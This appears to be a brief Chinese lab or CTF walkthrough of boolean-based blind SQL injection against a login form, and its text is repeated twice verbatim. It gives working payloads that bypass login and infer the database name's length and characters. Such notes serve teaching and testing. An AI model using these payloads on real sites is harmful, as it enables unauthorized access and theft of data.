错误不回显了
构造永真登陆
登陆成功了
虽然登陆成功了,但是数据库的数据还么有爆出来
构造一下用户名
1' or length(database())=8#
如果数据库名的长度不等于8,登陆会失败
猜测数据库名第一个字符是否为's',是则登陆成功
1' or ascii(substr(database(),1,1))=115#
错误不回显了
构造永真登陆
登陆成功了
虽然登陆成功了,但是数据库的数据还么有爆出来
构造一下用户名
1' or length(database())=8#
如果数据库名的长度不等于8,登陆会失败
猜测数据库名第一个字符是否为's',是则登陆成功
1' or ascii(substr(database(),1,1))=115#